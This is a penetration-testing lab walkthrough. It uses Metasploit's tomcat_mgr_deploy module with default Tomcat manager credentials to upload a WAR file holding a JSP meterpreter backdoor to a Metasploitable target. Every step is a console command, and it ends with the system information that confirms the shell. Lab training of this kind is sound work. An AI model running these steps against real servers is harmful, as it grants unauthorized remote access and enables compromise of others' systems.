Use the Tomcat Password for Penetration
After obtaining the Tomcat password from the corresponding module, we will use the password to penetrate the target machine. We will use the exploit/multi/http/tomcat_mgr_deploy
module, which logs into the Tomcat Manager and executes a payload. This payload uploads a WAR package using the PUT operation, and this WAR package contains a JSP file that provides a meterpreter backdoor shell.
The attack module code:
- First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
- Search for the appropriate module:
search tomcat
- Then, select the appropriate attack module:
use exploit/multi/http/tomcat_mgr_deploy
- Use the
show
command to view the necessary parameters:
show options
- Set the target host address and the port to attack:
set rhost 192.168.122.102
- Set the port information:
set rport 8180
- Set the httpusername account name:
set httpusername tomcat
- Set the httppassword password:
set httppassword tomcat
- Then, perform the attack (this may take approximately one minute):
exploit
- Alright, we have now penetrated the target machine. Next, we will verify the successful penetration. In the successful command-line terminal, enter the command:
sysinfo
Do not enter whoami
, as it will cause an error because the meterpreter payload used here does not support commands like hostname
, id
, whoami
, etc. You can use the help
command to see the commands it supports:
As shown following, it displays the operating system information:
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Architecture : x86
System Language : en_US
Meterpreter : java/linux
Press Ctrl+D to quit the Metasploit console then start the inspection